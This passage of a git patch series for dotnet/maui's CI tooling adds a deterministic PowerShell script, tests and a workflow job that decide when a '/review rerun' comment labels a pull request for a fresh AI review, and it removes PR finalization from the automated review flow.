PR ready for rerun. + +.DESCRIPTION + This script is intentionally deterministic: it never uses AI and never + inspects untrusted text semantically. A rerun is eligible only when there is + new PR activity after the previous AI Summary or previous /review rerun: + a new non-command comment, or a new commit. 
+#> + +param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [Parameter(Mandatory = $true)] + [Int64]$CurrentCommentId, + + [string]$Owner = 'dotnet', + [string]$Repo = 'maui', + + [switch]$ApplyLabel +) + +$ErrorActionPreference = 'Stop' +$AISummaryMarker = '' +$ReadyForRerunLabel = 's/agent-ready-for-rerun' +$ReadyForRerunLabelDescription = 'AI review has new PR activity and is ready for rerun' +$ReadyForRerunLabelColor = '5319E7' + +function ConvertTo-DateTimeOffset { + param([Parameter(Mandatory = $true)]$Value) + + if ($Value -is [datetimeoffset]) { + return $Value + } + if ($Value -is [datetime]) { + return [datetimeoffset]$Value + } + return [datetimeoffset]::Parse([string]$Value, [Globalization.CultureInfo]::InvariantCulture, [Globalization.DateTimeStyles]::AssumeUniversal) +} + +function Test-RerunCommand { + param([string]$Body) + + return ([string]$Body).Trim() -match '(?i)^/review\s+rerun\s*$' +} + +function Get-ObjectDate { + param( + [Parameter(Mandatory = $true)]$Object, + [Parameter(Mandatory = $true)][string]$PropertyName + ) + + $value = $Object.$PropertyName + if ($null -eq $value) { + return $null + } + + return ConvertTo-DateTimeOffset $value +} + +function Get-LatestAISummaryComment { + param([object[]]$Comments) + + return @($Comments | + Where-Object { $_.body -and ([string]$_.body).Contains($AISummaryMarker) } | + Sort-Object @{ Expression = { Get-ObjectDate $_ 'updated_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | + Select-Object -First 1) +} + +function Get-LatestRerunCommentBefore { + param( + [object[]]$Comments, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId + ) + + $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) + if (-not $current) { + return $null + } + + $currentCreatedAt = Get-ObjectDate $current 'created_at' + return @($Comments | + Where-Object { + [Int64]$_.id -ne $CurrentCommentId -and + (Test-RerunCommand $_.body) 
-and + (Get-ObjectDate $_ 'created_at') -lt $currentCreatedAt + } | + Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | + Select-Object -First 1) +} + +function Get-LatestReviewedSha { + param([string]$AISummaryBody) + + if ([string]::IsNullOrWhiteSpace($AISummaryBody)) { + return $null + } + + $matches = [regex]::Matches($AISummaryBody, '') + if ($matches.Count -eq 0) { + return $null + } + + return $matches[$matches.Count - 1].Groups[1].Value.ToLowerInvariant() +} + +function Test-CommentIsEvidence { + param( + [Parameter(Mandatory = $true)]$Comment, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId + ) + + if ([Int64]$Comment.id -eq $CurrentCommentId) { + return $false + } + if (Test-RerunCommand $Comment.body) { + return $false + } + if ($Comment.user -and $Comment.user.type -eq 'Bot') { + return $false + } + if ($Comment.user -and $Comment.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$') { + return $false + } + + return $true +} + +function Test-HasEvidenceCommentAfter { + param( + [object[]]$Comments, + [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId + ) + + return [bool]@($Comments | Where-Object { + (Test-CommentIsEvidence -Comment $_ -CurrentCommentId $CurrentCommentId) -and + (Get-ObjectDate $_ 'created_at') -gt $Checkpoint + } | Select-Object -First 1) +} + +function Test-HasCommitAfter { + param( + [object[]]$Commits, + [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint + ) + + return [bool]@($Commits | Where-Object { + $date = $null + if ($_.commit -and $_.commit.committer -and $_.commit.committer.date) { + $date = ConvertTo-DateTimeOffset $_.commit.committer.date + } elseif ($_.commit -and $_.commit.author -and $_.commit.author.date) { + $date = ConvertTo-DateTimeOffset $_.commit.author.date + } + + $date -and $date -gt $Checkpoint + } | Select-Object -First 1) +} + 
+function Test-HeadDiffersFromReviewedSha { + param( + [string]$CurrentHeadSha, + [string]$LatestReviewedSha + ) + + if ([string]::IsNullOrWhiteSpace($CurrentHeadSha) -or [string]::IsNullOrWhiteSpace($LatestReviewedSha)) { + return $false + } + + return -not $CurrentHeadSha.ToLowerInvariant().StartsWith($LatestReviewedSha.ToLowerInvariant()) +} + +function ConvertTo-RerunActivityItem { + param( + [Parameter(Mandatory = $true)]$Item, + [Parameter(Mandatory = $true)][string]$Kind + ) + + $createdAt = $Item.created_at + if ($Kind -eq 'review') { + $createdAt = $Item.submitted_at + } + + $updatedAt = $Item.updated_at + if ($null -eq $updatedAt) { + $updatedAt = $createdAt + } + + return [pscustomobject]@{ + id = [Int64]$Item.id + kind = $Kind + body = [string]$Item.body + created_at = $createdAt + updated_at = $updatedAt + user = $Item.user + } +} + +function Resolve-RerunEligibility { + param( + [object[]]$Comments, + [object[]]$Commits, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId, + [string]$CurrentHeadSha, + [object[]]$CurrentLabels = @() + ) + + $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) + if (-not $current) { + return [pscustomobject]@{ Eligible = $false; Reason = 'current-comment-not-found'; Label = $ReadyForRerunLabel } + } + + if (-not (Test-RerunCommand $current.body)) { + return [pscustomobject]@{ Eligible = $false; Reason = 'not-rerun-command'; Label = $ReadyForRerunLabel } + } + + if ($current.user -and ($current.user.type -eq 'Bot' -or $current.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$')) { + return [pscustomobject]@{ Eligible = $false; Reason = 'bot-comment'; Label = $ReadyForRerunLabel } + } + + $latestSummary = Get-LatestAISummaryComment -Comments $Comments + if (-not $latestSummary) { + return [pscustomobject]@{ Eligible = $false; Reason = 'no-ai-summary'; Label = $ReadyForRerunLabel } + } + + if (@($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel 
}).Count -gt 0) { + return [pscustomobject]@{ Eligible = $true; Reason = 'label-already-present'; Label = $ReadyForRerunLabel } + } + + $summaryUpdatedAt = Get-ObjectDate $latestSummary 'updated_at' + $latestReviewedSha = Get-LatestReviewedSha -AISummaryBody $latestSummary.body + $previousRerun = Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId $CurrentCommentId + $checkpoint = $summaryUpdatedAt + $checkpointReason = 'ai-summary' + if ($previousRerun) { + $previousRerunCreatedAt = Get-ObjectDate $previousRerun 'created_at' + if ($previousRerunCreatedAt -gt $checkpoint) { + $checkpoint = $previousRerunCreatedAt + $checkpointReason = 'previous-rerun' + } + } + + if ($checkpointReason -eq 'ai-summary' -and (Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha)) { + return [pscustomobject]@{ Eligible = $true; Reason = 'new-head-commit'; Label = $ReadyForRerunLabel } + } + + if (Test-HasEvidenceCommentAfter -Comments $Comments -Checkpoint $checkpoint -CurrentCommentId $CurrentCommentId) { + $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-comment-after-previous-rerun' } else { 'new-comment-after-ai-summary' } + return [pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } + } + + if (Test-HasCommitAfter -Commits $Commits -Checkpoint $checkpoint) { + $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-commit-after-previous-rerun' } else { 'new-commit-after-ai-summary' } + return [pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } + } + + return [pscustomobject]@{ Eligible = $false; Reason = 'no-new-comments-or-commits'; Label = $ReadyForRerunLabel } +} + +if ($MyInvocation.InvocationName -eq '.') { + return +} + +$issueComments = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'issue-comment' }) 
+$reviews = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/reviews?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review' }) +$reviewComments = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review-comment' }) +$comments = @($issueComments + $reviews + $reviewComments) +$pr = gh api "repos/$Owner/$Repo/pulls/$PRNumber" | ConvertFrom-Json +$commits = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/commits?per_page=100" --paginate --jq '.[]' | ForEach-Object { $_ | ConvertFrom-Json }) +$labels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) + +if ($pr.state -ne 'open') { + throw "PR #$PRNumber is not open (state: $($pr.state))" +} + +$result = Resolve-RerunEligibility ` + -Comments $comments ` + -Commits $commits ` + -CurrentCommentId $CurrentCommentId ` + -CurrentHeadSha $pr.head.sha ` + -CurrentLabels $labels + +Write-Host "Rerun eligibility: $($result.Eligible) ($($result.Reason))" + +if ($env:GITHUB_OUTPUT) { + "eligible=$($result.Eligible.ToString().ToLowerInvariant())" >> $env:GITHUB_OUTPUT + "reason=$($result.Reason)" >> $env:GITHUB_OUTPUT + "label=$($result.Label)" >> $env:GITHUB_OUTPUT +} + +if ($ApplyLabel -and $result.Eligible) { + . 
"$PSScriptRoot/shared/Update-AgentLabels.ps1" + Ensure-LabelExists ` + -LabelName $ReadyForRerunLabel ` + -Description $ReadyForRerunLabelDescription ` + -Color $ReadyForRerunLabelColor ` + -Owner $Owner ` + -Repo $Repo + + $alreadyPresent = @($labels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 + if ($alreadyPresent) { + Write-Host " ✅ Already present: $ReadyForRerunLabel" -ForegroundColor Green + } else { + if (Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo) { + Write-Host " ✅ Applied: $ReadyForRerunLabel" -ForegroundColor Green + } else { + throw "Failed to apply label: $ReadyForRerunLabel" + } + } +} diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 1caa3190d53a..357b9f1329b2 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -593,6 +593,7 @@ if ($existingRaw) { $authorPing = "" if ($prAuthor) { $authorPing = "> @$prAuthor — new AI review results are available based on this last commit: $commitSha7.`n> **$commitTitle**" + $authorPing += ' To request a deterministic rerun after new comments or commits, comment `/review rerun`.' 
} $reviewStatus = switch ($reviewEvent) { diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index 7c2cd59c1d15..5672aee00747 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -37,6 +37,7 @@ $script:SignalLabels = @{ $script:ManualLabels = @{ 's/agent-fix-implemented' = @{ Description = 'PR author implemented the agent suggested fix'; Color = '7B1FA2' } + 's/agent-ready-for-rerun' = @{ Description = 'AI review has new PR activity and is ready for rerun'; Color = '5319E7' } } $script:TrackingLabel = @{ diff --git a/.github/workflows/review-trigger.yml b/.github/workflows/review-trigger.yml index be5417181a81..eabebeaad97d 100644 --- a/.github/workflows/review-trigger.yml +++ b/.github/workflows/review-trigger.yml @@ -38,6 +38,7 @@ jobs: timeout-minutes: 2 outputs: matched: ${{ steps.check.outputs.matched }} + command: ${{ steps.check.outputs.command }} steps: - name: Match /review command id: check @@ -46,19 +47,72 @@ jobs: run: | if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then echo "matched=true" >> "$GITHUB_OUTPUT" + echo "command=review" >> "$GITHUB_OUTPUT" + exit 0 + fi + TRIMMED_BODY=$(printf '%s' "${COMMENT_BODY}" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//') + if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun$ ]]; then + echo "matched=true" >> "$GITHUB_OUTPUT" + echo "command=rerun" >> "$GITHUB_OUTPUT" + exit 0 + fi + if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun([[:space:]]|$) ]]; then + echo "matched=false" >> "$GITHUB_OUTPUT" + echo "command=none" >> "$GITHUB_OUTPUT" exit 0 fi # Match `/review` as the first non-whitespace token, optionally followed by args. # Allows arbitrary leading whitespace (spaces, tabs, newlines). 
if [[ "${COMMENT_BODY}" =~ ^[[:space:]]*/review([[:space:]]|$) ]]; then echo "matched=true" >> "$GITHUB_OUTPUT" + echo "command=review" >> "$GITHUB_OUTPUT" else echo "matched=false" >> "$GITHUB_OUTPUT" + echo "command=none" >> "$GITHUB_OUTPUT" fi + mark-rerun-ready: + needs: match + if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'rerun' + runs-on: ubuntu-latest + concurrency: + group: review-rerun-${{ github.event.issue.number }} + cancel-in-progress: false + timeout-minutes: 5 + permissions: + contents: read + issues: write + pull-requests: read + steps: + - name: Checkout repository scripts + uses: actions/checkout@v4 + with: + persist-credentials: false + + - name: Determine rerun eligibility and apply label + id: rerun + env: + GH_TOKEN: ${{ github.token }} + shell: pwsh + run: | + .github/scripts/Resolve-RerunEligibility.ps1 ` + -Owner '${{ github.repository_owner }}' ` + -Repo '${{ github.event.repository.name }}' ` + -PRNumber ${{ github.event.issue.number }} ` + -CurrentCommentId ${{ github.event.comment.id }} ` + -ApplyLabel + + - name: Summarize rerun decision + shell: pwsh + run: | + "### /review rerun" >> $env:GITHUB_STEP_SUMMARY + "Eligible: ${{ steps.rerun.outputs.eligible }}" >> $env:GITHUB_STEP_SUMMARY + "Reason: ${{ steps.rerun.outputs.reason }}" >> $env:GITHUB_STEP_SUMMARY + "Label: ${{ steps.rerun.outputs.label }}" >> $env:GITHUB_STEP_SUMMARY + trigger-review: needs: match - if: needs.match.outputs.matched == 'true' + if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'review' runs-on: ubuntu-latest concurrency: group: review-trigger-${{ github.event.issue.number || inputs.pr_number }} From 19812a027c28b5ef9eedf00585433b88d9ecc130 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:32:02 +0200 Subject: [PATCH 23/34] Verify rerun label application Treat label application as successful when the ready-for-rerun label is present after the 
GitHub API call, avoiding false failures from brittle gh exit-code handling. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Resolve-RerunEligibility.ps1 | 5 ++++- .github/scripts/shared/Update-AgentLabels.ps1 | 8 ++++---- 2 files changed, 8 insertions(+), 5 deletions(-) diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 index 72eca378f866..1497c6b47075 100644 --- a/.github/scripts/Resolve-RerunEligibility.ps1 +++ b/.github/scripts/Resolve-RerunEligibility.ps1 @@ -304,7 +304,10 @@ if ($ApplyLabel -and $result.Eligible) { if ($alreadyPresent) { Write-Host " ✅ Already present: $ReadyForRerunLabel" -ForegroundColor Green } else { - if (Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo) { + $addSucceeded = Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo + $updatedLabels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) + $labelIsPresent = @($updatedLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 + if ($addSucceeded -or $labelIsPresent) { Write-Host " ✅ Applied: $ReadyForRerunLabel" -ForegroundColor Green } else { throw "Failed to apply label: $ReadyForRerunLabel" diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index 5672aee00747..465d196371cc 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -127,9 +127,9 @@ function Add-Label { [string]$Repo = 'maui' ) - gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` + & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` --method POST ` - -f "labels[]=$LabelName" 2>$null | Out-Null + -f "labels[]=$LabelName" 1>$null 2>$null return $LASTEXITCODE -eq 0 } @@ -144,8 +144,8 @@ function Remove-Label { [string]$Repo = 'maui' ) - gh api 
"repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` - --method DELETE 2>$null | Out-Null + & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` + --method DELETE 1>$null 2>$null return $LASTEXITCODE -eq 0 } From 87c03f033f9e66681e3dc293f878afc99bbeaa81 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:34:20 +0200 Subject: [PATCH 24/34] Use JSON when adding agent labels Post label additions with the GitHub Issues API JSON payload shape so /review rerun can reliably apply s/agent-ready-for-rerun from GitHub Actions. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/shared/Update-AgentLabels.ps1 | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index 465d196371cc..e963e956c63c 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -127,10 +127,19 @@ function Add-Label { [string]$Repo = 'maui' ) - & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` - --method POST ` - -f "labels[]=$LabelName" 1>$null 2>$null - return $LASTEXITCODE -eq 0 + $tmp = $null + try { + $tmp = New-TemporaryFile + @{ labels = @($LabelName) } | ConvertTo-Json -Compress | Set-Content -LiteralPath $tmp -Encoding utf8 -NoNewline + & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` + --method POST ` + --input $tmp 1>$null 2>$null + return $LASTEXITCODE -eq 0 + } finally { + if ($tmp) { + Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + } + } } # ============================================================ From 4148e723a192685ad77d869987d9dc48c0c92058 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:36:28 +0200 Subject: [PATCH 25/34] Allow rerun workflow to 
label PRs Grant pull-requests: write to the /review rerun labeling job so it can apply s/agent-ready-for-rerun to pull requests after deterministic eligibility passes. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/workflows/review-trigger.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/review-trigger.yml b/.github/workflows/review-trigger.yml index eabebeaad97d..c81111252c4f 100644 --- a/.github/workflows/review-trigger.yml +++ b/.github/workflows/review-trigger.yml @@ -82,7 +82,7 @@ jobs: permissions: contents: read issues: write - pull-requests: read + pull-requests: write steps: - name: Checkout repository scripts uses: actions/checkout@v4 From 84421cfb61bb5ff925ddfb7f62ddea171fec2dfe Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 23:24:26 +0200 Subject: [PATCH 26/34] Remove PR finalization from AI review flow Stop preserving PR finalization sections in MauiBot AI Summary updates and update docs so pr-finalize is no longer described as part of the automated Review-PR process. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/docs/agent-labels.md | 5 ++--- .github/scripts/post-ai-summary-comment.ps1 | 13 +------------ .github/skills/pr-finalize/SKILL.md | 4 ++-- 3 files changed, 5 insertions(+), 17 deletions(-) diff --git a/.github/docs/agent-labels.md b/.github/docs/agent-labels.md index 13f5be605ed8..5793264ec9a9 100644 --- a/.github/docs/agent-labels.md +++ b/.github/docs/agent-labels.md @@ -63,9 +63,8 @@ Review-PR.ps1 │ ├── Validate → writes content.md │ ├── Fix → writes content.md │ └── Report → writes content.md -├── Phase 2: PR Finalize (optional) -├── Phase 3: Post Comments (optional) -└── Phase 4: Apply Labels ← labels are applied here +├── Phase 2: Post Comments (optional) +└── Phase 3: Apply Labels ← labels are applied here ├── Parse content.md files ├── Determine outcome + signal labels ├── Apply via GitHub REST API diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 357b9f1329b2..f49bed0248b0 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -609,17 +609,6 @@ $statusChipRow = New-StatusChipRow ` -Platform (Get-PlatformStatus -Contents $summaryContent) $futureActionSection = New-FutureActionSection -PRAgentDir $PRAgentDir -$finalizeSection = "" -$finalizePattern = '(?s)(.*?)' -if ($existingBodies -and $existingBodies.Count -gt 0) { - for ($i = $existingBodies.Count - 1; $i -ge 0; $i--) { - if ($existingBodies[$i] -match $finalizePattern) { - $finalizeSection = "`n`n" + $Matches[1] - break - } - } -} - $commentBody = @" $MARKER @@ -631,7 +620,7 @@ $statusChipRow $newSessionBlock -$futureActionSection$finalizeSection +$futureActionSection "@ # Clean up excessive blank lines diff --git a/.github/skills/pr-finalize/SKILL.md b/.github/skills/pr-finalize/SKILL.md index 9932ac6534c5..3dc0d6ec33a2 100644 --- a/.github/skills/pr-finalize/SKILL.md +++ b/.github/skills/pr-finalize/SKILL.md 
@@ -39,7 +39,7 @@ Ensures PR title and description accurately reflect the implementation, and perf **Correct workflow:** 1. **This skill**: Analyze PR, produce findings and write to `pr-finalize-summary.md` -2. **Review-PR.ps1** calls `post-pr-finalize-comment.ps1` to post the summary +2. **Human-controlled follow-up**: PR finalization is not part of the automated `Review-PR.ps1` flow. Only post or use the summary when a user explicitly asks for PR finalization. **Only humans control when comments are posted.** Your job is to analyze and present findings. @@ -366,7 +366,7 @@ gh pr diff XXXXX -- path/to/file.cs **Workflow:** 1. **This skill**: Analyze PR, produce findings and write to `pr-finalize-summary.md` -2. **Review-PR.ps1** calls `post-pr-finalize-comment.ps1` to post the summary +2. **Human-controlled follow-up**: PR finalization is not part of the automated `Review-PR.ps1` flow. Only post or use the summary when a user explicitly asks for PR finalization. The user controls when comments are posted. Your job is to analyze and present findings. From f1d8b1c86ba8de20fdc643da71ae126e3e4c547e Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 13:56:01 +0200 Subject: [PATCH 27/34] Include rerun activity in pre-flight context Generate a deterministic rerun context artifact listing new comments and commits since the latest AI Summary or previous /review rerun checkpoint, and instruct pre-flight to read it before reviewing. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Resolve-RerunEligibility.Tests.ps1 | 21 ++ .github/scripts/Resolve-RerunEligibility.ps1 | 180 +++++++++++++++++- .github/scripts/Review-PR.ps1 | 30 +++ 3 files changed, 229 insertions(+), 2 deletions(-) diff --git a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 index 35911de8ac4e..e5ca621a5b15 100644 --- a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 +++ b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 @@ -208,4 +208,25 @@ Describe 'Resolve-RerunEligibility' { $result.Eligible | Should -BeTrue $result.Reason | Should -Be 'label-already-present' } + + It 'builds deterministic rerun context with new comments and commits' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 2 -Body 'New author context.' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 3 -Body '/review rerun' -CreatedAt '2026-05-31T09:50:00Z' + ) + $commits = @( + New-TestCommit -Sha 'fedcba9876543210' -Date '2026-05-31T09:48:00Z' + ) + + $context = New-RerunContextMarkdown -Comments $comments -Commits $commits -CurrentHeadSha 'fedcba9876543210' + + $context | Should -Match '# Rerun Context' + $context | Should -Match 'New non-command comments: 1' + $context | Should -Match 'New commits: 1' + $context | Should -Match '`s/agent-ready-for-rerun` present: false' + $context | Should -Match 'New author context' + $context | Should -Match 'fedcba9' + $context | Should -Not -Match '\| .*\/review rerun' + } } diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 index 1497c6b47075..d388cd65cde1 100644 --- a/.github/scripts/Resolve-RerunEligibility.ps1 +++ b/.github/scripts/Resolve-RerunEligibility.ps1 @@ -14,12 +14,13 @@ param( [Parameter(Mandatory = $true)] [int]$PRNumber, - 
[Parameter(Mandatory = $true)] - [Int64]$CurrentCommentId, + [Int64]$CurrentCommentId = 0, [string]$Owner = 'dotnet', [string]$Repo = 'maui', + [string]$ContextOutputPath, + [switch]$ApplyLabel ) @@ -92,6 +93,15 @@ function Get-LatestRerunCommentBefore { Select-Object -First 1) } +function Get-LatestRerunComment { + param([object[]]$Comments) + + return @($Comments | + Where-Object { Test-RerunCommand $_.body } | + Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | + Select-Object -First 1) +} + function Get-LatestReviewedSha { param([string]$AISummaryBody) @@ -160,6 +170,18 @@ function Test-HasCommitAfter { } | Select-Object -First 1) } +function Get-CommitDate { + param($Commit) + + if ($Commit.commit -and $Commit.commit.committer -and $Commit.commit.committer.date) { + return ConvertTo-DateTimeOffset $Commit.commit.committer.date + } + if ($Commit.commit -and $Commit.commit.author -and $Commit.commit.author.date) { + return ConvertTo-DateTimeOffset $Commit.commit.author.date + } + return $null +} + function Test-HeadDiffersFromReviewedSha { param( [string]$CurrentHeadSha, @@ -199,6 +221,136 @@ function ConvertTo-RerunActivityItem { } } +function Format-MarkdownCell { + param([string]$Value) + + if ([string]::IsNullOrWhiteSpace($Value)) { + return '' + } + + $singleLine = ($Value -replace '\r?\n', ' ').Trim() + if ($singleLine.Length -gt 180) { + $singleLine = $singleLine.Substring(0, 177) + '...' 
+ } + + return ($singleLine -replace '\|', '\|') +} + +function New-RerunContextMarkdown { + param( + [object[]]$Comments, + [object[]]$Commits, + [string]$CurrentHeadSha, + [object[]]$CurrentLabels = @() + ) + + $latestSummary = Get-LatestAISummaryComment -Comments $Comments + $latestRerun = Get-LatestRerunComment -Comments $Comments + $checkpointRerun = if ($latestRerun) { Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId ([Int64]$latestRerun.id) } else { $null } + $readyLabelPresent = @($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 + + $latestReviewedSha = if ($latestSummary) { Get-LatestReviewedSha -AISummaryBody $latestSummary.body } else { $null } + $summaryUpdatedAt = if ($latestSummary) { Get-ObjectDate $latestSummary 'updated_at' } else { $null } + + $checkpoint = $summaryUpdatedAt + $checkpointReason = if ($latestSummary) { 'latest AI Summary' } else { 'none' } + if ($checkpointRerun) { + $checkpointRerunCreatedAt = Get-ObjectDate $checkpointRerun 'created_at' + if (-not $checkpoint -or $checkpointRerunCreatedAt -gt $checkpoint) { + $checkpoint = $checkpointRerunCreatedAt + $checkpointReason = 'previous /review rerun' + } + } + + $evidenceComments = @() + if ($checkpoint) { + $evidenceComments = @($Comments | Where-Object { + (Test-CommentIsEvidence -Comment $_ -CurrentCommentId 0) -and + (Get-ObjectDate $_ 'created_at') -gt $checkpoint + } | Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $false }, @{ Expression = { [Int64]$_.id }; Descending = $false }) + } + + $newCommits = @() + if ($checkpoint) { + $newCommits = @($Commits | Where-Object { + $date = Get-CommitDate $_ + $date -and $date -gt $checkpoint + } | Sort-Object @{ Expression = { Get-CommitDate $_ }; Descending = $false }) + } + + $headDiffers = Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha + $lines = [System.Collections.Generic.List[string]]::new() + $lines.Add('# 
Rerun Context') + $lines.Add('') + $lines.Add('This file was generated deterministically before pre-flight. No AI was used to decide or summarize this context.') + $lines.Add('') + $lines.Add('## Checkpoint') + $lines.Add('') + if ($latestSummary) { + $lines.Add("- Latest AI Summary: $($latestSummary.kind) `#$($latestSummary.id)` updated $($summaryUpdatedAt.ToString('u'))") + } else { + $lines.Add('- Latest AI Summary: not found') + } + if ($latestRerun) { + $lines.Add("- Latest `/review rerun`: comment `#$($latestRerun.id)` created $((Get-ObjectDate $latestRerun 'created_at').ToString('u'))") + } else { + $lines.Add('- Latest `/review rerun`: not found') + } + if ($checkpointRerun) { + $lines.Add("- Previous `/review rerun` checkpoint: comment `#$($checkpointRerun.id)` created $((Get-ObjectDate $checkpointRerun 'created_at').ToString('u'))") + } + if ($checkpoint) { + $lines.Add("- Activity checkpoint: $checkpointReason at $($checkpoint.ToString('u'))") + } else { + $lines.Add('- Activity checkpoint: none') + } + $lines.Add("- Latest reviewed SHA: $(if ($latestReviewedSha) { $latestReviewedSha } else { 'unknown' })") + $lines.Add("- Current head SHA: $(if ($CurrentHeadSha) { $CurrentHeadSha } else { 'unknown' })") + $lines.Add("- Current head differs from latest reviewed SHA: $($headDiffers.ToString().ToLowerInvariant())") + $lines.Add("- ``$ReadyForRerunLabel`` present: $($readyLabelPresent.ToString().ToLowerInvariant())") + $lines.Add('') + $lines.Add('## New activity since checkpoint') + $lines.Add('') + $lines.Add("- New non-command comments: $($evidenceComments.Count)") + $lines.Add("- New commits: 